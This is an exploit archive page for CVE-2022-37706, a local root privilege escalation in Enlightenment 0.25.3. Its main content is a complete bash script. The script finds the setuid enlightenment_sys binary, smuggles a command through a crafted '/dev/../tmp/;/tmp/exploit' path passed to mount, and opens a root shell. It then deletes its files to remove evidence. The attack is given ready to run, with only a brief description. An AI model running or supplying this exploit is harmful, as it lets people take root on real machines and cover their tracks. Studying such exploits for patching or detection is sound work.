Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Enlightenment 0.25.3 Privilege Escalation[6]
- Authored by nu11secur1ty[7]
-
Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.
- advisories | CVE-2022-37706[8]
- SHA-256 |
e93489fd26e004d0d8880e5321f8ef4bf09f86a9c280083061f1af59051648cf
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
## Title: Enlightenment Version: 0.25.3 LPE
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.4 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring
If the attacker has access locally to some machine on which the
machine is installed Enlightenment
he can use this vulnerability to do very dangerous stuff.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
File Tags
- ActiveX[18] (932)
- Advisory[19] (79,773)
- Arbitrary[20] (15,701)
- BBS[21] (2,859)
- Bypass[22] (1,620)
- CGI[23] (1,018)
- Code Execution[24] (6,939)
- Conference[25] (673)
- Cracker[26] (840)
- CSRF[27] (3,290)
- DoS[28] (22,606)
- Encryption[29] (2,352)
- Exploit[30] (50,380)
- File Inclusion[31] (4,165)
- File Upload[32] (946)
- Firewall[33] (821)
- Info Disclosure[34] (2,662)
- Intrusion Detection[35] (867)
- Java[36] (2,899)
- JavaScript[37] (821)
- Kernel[38] (6,293)
- Local[39] (14,202)
- Magazine[40] (586)
- Overflow[41] (12,425)
- Perl[42] (1,418)
- PHP[43] (5,093)
- Proof of Concept[44] (2,291)
- Protocol[45] (3,435)
- Python[46] (1,468)
- Remote[47] (30,054)
- Root[48] (3,505)
- Ruby[49] (594)
- Scanner[50] (1,632)
- Security Tool[51] (7,782)
- Shell[52] (3,104)
- Shellcode[53] (1,206)
- Sniffer[54] (886)
- Spoof[55] (2,171)
- SQL Injection[56] (16,108)
- TCP[57] (2,379)
- Trojan[58] (686)
- UDP[59] (876)
- Virus[60] (662)
- Vulnerability[61] (31,151)
- Web[62] (9,365)
- Whitepaper[63] (3,729)
- x86[64] (946)
- XSS[65] (17,498)
- Other[66]
File Archives
- December 2022[67]
- November 2022[68]
- October 2022[69]
- September 2022[70]
- August 2022[71]
- July 2022[72]
- June 2022[73]
- May 2022[74]
- April 2022[75]
- March 2022[76]
- February 2022[77]
- January 2022[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,935)
- BSD[82] (370)
- CentOS[83] (55)
- Cisco[84] (1,917)
- Debian[85] (6,638)
- Fedora[86] (1,690)
- FreeBSD[87] (1,242)
- Gentoo[88] (4,277)
- HPUX[89] (878)
- iOS[90] (333)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (44,326)
- Mac OS X[95] (684)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (479)
- RedHat[99] (12,469)
- Slackware[100] (941)
- Solaris[101] (1,607)
- SUSE[102] (1,444)
- Ubuntu[103] (8,200)
- UNIX[104] (9,162)
- UnixWare[105] (185)
- Windows[106] (6,511)
- Other[107]